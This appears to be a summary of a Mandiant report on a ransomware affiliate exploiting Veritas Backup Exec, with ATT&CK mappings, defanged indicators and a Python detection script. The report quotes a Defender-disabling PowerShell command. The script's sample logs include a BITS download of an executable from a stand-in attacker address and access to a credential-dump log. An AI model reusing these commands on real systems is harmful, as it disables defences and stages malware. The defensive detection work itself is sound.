ALPHV Ransomware Affiliate Targets Vulnerable Backup Installations to Gain Initial Access | Mandiant

Mandiant observed an ALPHV/BlackCat affiliate tracked as UNC4466 exploiting internet-exposed Veritas Backup Exec instances (vulnerable to CVE-2021-27876/27877/27878) via a Metasploit module to gain initial access. The actor used BITS transfers to stage tools, SOCKS5 tunneling for C2, and credential-dumping tools before deploying ALPHV ransomware. #ALPHV #VeritasBackupExec

Keypoints

  • UNC4466 exploited internet-accessible Veritas Backup Exec (pre-21.2) using a Metasploit module to achieve initial access.
  • The actor used Metasploit persistence and modifications to domain policy to maintain footholds and execute payloads across the network.
  • Internal reconnaissance included Advanced IP Scanner and ADRecon to enumerate hosts, accounts, and AD configuration.
  • Ingress of additional tools leveraged BITS (Start-BitsTransfer) to download LAZAGNE, LIGOLO, REVSOCKS, WINSW, RCLONE and the ALPHV encryptor.
  • Credential access relied on Mimikatz (MemSSP), LaZagne, and Nanodump to collect clear-text credentials and LSASS memory dumps.
  • Command-and-control used SOCKS5 tunneling (LIGOLO, REVSOCKS); defense evasion included clearing logs and disabling Defender via Set-MpPreference.
  • Mandiant recommends prioritizing detection of internet-exposed Backup Exec instances, forwarding Backup Exec logs to SIEMs, and monitoring suspicious BITS and pre/post-job commands.

MITRE Techniques

  • [T1190] Exploit Public-Facing Application – UNC4466 used a Metasploit module to exploit Veritas Backup Exec for initial access (‘In late 2022, UNC4466 gained access to an internet-exposed Windows server, running Veritas Backup Exec version 21.0 using the Metasploit module `exploit/multi/veritas/beagent_sha_auth_rce`.’)
  • [T1547] Boot or Logon Autostart Execution – Persistence was established via Metasploit persistence mechanisms and creation/modification of run keys (‘the Metasploit persistence module was invoked to maintain persistent access to the system for the remainder of this intrusion.’ / ‘Modification of Registry run keys’)
  • [T1105] Ingress Tool Transfer – BITS (Start-BitsTransfer) was used to download tooling and payloads into staging directories (‘made heavy use of the Background Intelligent Transfer Service (BITS) to download additional tools such as LAZAGNE, LIGOLO, WINSW, RCLONE, and finally the ALPHV ransomware encryptor.’)
  • [T1090] Proxy/Tunneling – SOCKS5 tunneling (LIGOLO, REVSOCKS) provided C2 connectivity and relay through compromised hosts (‘UNC4466 leveraged SOCKS5 tunneling to communicate with compromised systems in the victim network. … Two separate tools were deployed … LIGOLO and REVSOCKS.’)
  • [T1003.001] OS Credential Dumping: LSASS Memory – Credential dumping via Mimikatz (MemSSP) and Nanodump captured clear-text credentials and LSASS memory (‘The threat actor utilized multiple credential access tools, including Mimikatz, LaZagne and Nanodump to gather clear-text credentials and credential material.’ / ‘MIMIKATZ Security Support Provider injection module (`MISC::MemSSP`).’)
  • [T1070.001] Clear Windows Event Logs – The actor cleared event logs as part of evasion (‘Apart from clearing event logs, UNC4466 also used the built-in Set-MpPreference cmdlet to disable Microsoft Defender’s real-time monitoring capability.’)
  • [T1562.001] Disable or Modify Security Tools – Microsoft Defender real-time monitoring was disabled via Set-MpPreference PowerShell cmdlet (‘powershell.exe Set-MpPreference -DisableRealtimeMonitoring 1 -ErrorAction SilentlyContinue’)
  • [T1484] Domain Policy Modification – Immediate tasks were added to the default domain policy to disable security software, download the encryptor, and run it (‘UNC4466 added immediate tasks to the default domain policy. These tasks were configured to perform actions which disabled security software, downloaded the ALPHV encryptor, then executed it.’)

Indicators of Compromise

  • [File hashes] Tool and payload hashes observed – ee6e0cb1b3b7601696e9a05ce66e7f37 (ALPHV), da202cc4b3679fdb47003d603a93c90d (MIMIKATZ), and multiple other hashes reported.
  • [IP addresses] C2 and staging hosts – 45[.]61[.]138[.]109, 185[.]141[.]62[.]123 (multiple ports and URLs observed), plus additional IPs listed.
  • [URLs/domains] Download locations and staging URLs – hxxps://download.advanced-ip-scanner[.]com, hxxp://185[.]141[.]62[.]123:10228/update[.]exe, and GitHub repositories used for LIGOLO/REVSOCKS.
  • [File names/paths] Staging and artifact paths – C:\ProgramData (staging), C:\Windows\Temp\[random].exe (downloaded executables), C:\Windows\System32\mimilsa.log (Mimikatz MemSSP output).

UNC4466 exploited internet-accessible Veritas Backup Exec (vulnerable versions prior to 21.2) using a publicly available Metasploit module to gain initial access and then invoked Metasploit persistence to maintain a foothold. After initial compromise, the actor conducted internal discovery with Advanced IP Scanner to map hosts and ADRecon to enumerate Active Directory, accounts, trusts, and group/policy information.

For tool ingress and staging, the threat actor heavily used BITS (Start-BitsTransfer) to download tooling into C:\ProgramData and other staging locations, pulling LAZAGNE, LIGOLO, REVSOCKS, WINSW, RCLONE and ultimately the ALPHV encryptor. C2 was implemented via SOCKS5 tunneling using LIGOLO and REVSOCKS to proxy communications through compromised hosts; credential access was achieved with Mimikatz (MemSSP), LaZagne and Nanodump to capture clear-text credentials and LSASS memory dumps.

Defense-evasion included clearing event logs and disabling Microsoft Defender real-time monitoring via Set-MpPreference. The actor also modified domain-level policies by adding immediate tasks to disable security, download the encryptor, and execute it across the environment. Detection opportunities include forwarding Backup Exec logs to SIEMs to flag unexpected remote connections and suspicious pre/post-job commands, monitoring for anomalous BITS transfers and new executables in staging directories, and watching for LSASS dumps and changes to Defender settings.
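As an added illustration of the detection opportunities above (this is example code written for this summary, not tooling from the Mandiant report), the following rules flag three of the observed behaviours in process-creation style records: Defender real-time monitoring disabled via Set-MpPreference, Start-BitsTransfer writing into C:\ProgramData or C:\Windows\Temp, and any reference to the MemSSP output file mimilsa.log. The record format, hostnames, usernames, file names and the 192.0.2.10 address are constructed assumptions; only the command patterns come from the report.

```python
import re
from dataclasses import dataclass


@dataclass
class Finding:
    host: str
    rule: str
    technique: str
    command: str


# Each rule: (name, ATT&CK id, compiled pattern). Patterns are tied to the
# commands described in the report: Defender tampering, BITS staging into
# C:\ProgramData or C:\Windows\Temp, and the MemSSP log file mimilsa.log.
RULES = [
    ("Defender real-time monitoring disabled", "T1562.001",
     re.compile(r"Set-MpPreference\b.*-DisableRealtimeMonitoring\s+(1|\$true)", re.I)),
    ("BITS download into staging directory", "T1105",
     re.compile(r"Start-BitsTransfer\b.*\bC:\\(ProgramData|Windows\\Temp)\b", re.I)),
    ("Mimikatz MemSSP log file referenced", "T1003.001",
     re.compile(r"\bmimilsa\.log\b", re.I)),
]

# Constructed sample records (not from the report): "<time> <host> <user> <command line>".
# 192.0.2.10 is a documentation address standing in for an attacker-controlled host.
SAMPLE_LOGS = [
    "2022-12-01T10:02:11 SRV-BKP01 SYSTEM powershell.exe Set-MpPreference -DisableRealtimeMonitoring 1 -ErrorAction SilentlyContinue",
    "2022-12-01T10:03:40 SRV-BKP01 SYSTEM powershell.exe Start-BitsTransfer -Source http://192.0.2.10:10228/update.exe -Destination C:\\Windows\\Temp\\qz1x.exe",
    "2022-12-01T10:05:02 SRV-BKP01 SYSTEM cmd.exe /c type C:\\Windows\\System32\\mimilsa.log",
    "2022-12-01T10:06:00 WS-042 jdoe powershell.exe Start-BitsTransfer -Source https://intranet.example.com/patch.msi -Destination C:\\Users\\jdoe\\Downloads\\patch.msi",
    "2022-12-01T10:07:15 WS-042 jdoe notepad.exe C:\\Users\\jdoe\\notes.txt",
]


def scan(lines):
    """Return one Finding per (record, rule) match; benign records produce nothing."""
    findings = []
    for line in lines:
        parts = line.split(" ", 3)
        if len(parts) < 4:
            continue  # malformed record: skip rather than crash the scan
        _ts, host, _user, command = parts
        for name, technique, pattern in RULES:
            if pattern.search(command):
                findings.append(Finding(host, name, technique, command))
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOGS):
        print(f"{f.host}: {f.technique} {f.rule} :: {f.command}")
```

The legitimate BITS transfer into a user's Downloads folder is deliberately left unflagged; in production the staging-directory list and the destination match would be tuned to the environment.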

Read more: https://www.mandiant.com/resources/blog/alphv-ransomware-backup